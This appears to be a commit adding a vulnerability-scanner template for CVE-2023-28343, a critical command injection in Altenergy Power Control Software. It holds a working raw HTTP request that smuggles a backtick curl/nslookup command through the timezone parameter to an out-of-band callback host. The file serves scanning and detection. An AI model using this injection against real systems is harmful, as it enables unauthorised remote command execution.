Create CVE-2023-28343

cves/2023/CVE-2023-28343

@@ -0,0 +1,35 @@
+id: CVE-2023-28343
+
+info:
+  name: Altenergy Power Control Software Command-Injection
+  author: pikpikcu
+  severity: critical
+  description: |
+    OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28343
+    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-28343
+    cwe-id: CWE-78
+  tags: cve,cve2023,rce,altenergy
+
+requests:
+  - raw:
+      - |
+        POST /index.php/management/set_timezone HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Accept-Encoding: gzip, deflate
+        Referer: {{Hostname}}/index.php/management/datetime
+        timezone=`curl {{interactsh-url}} | nslookup {{interactsh-url}}`
+ 
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+          - "http"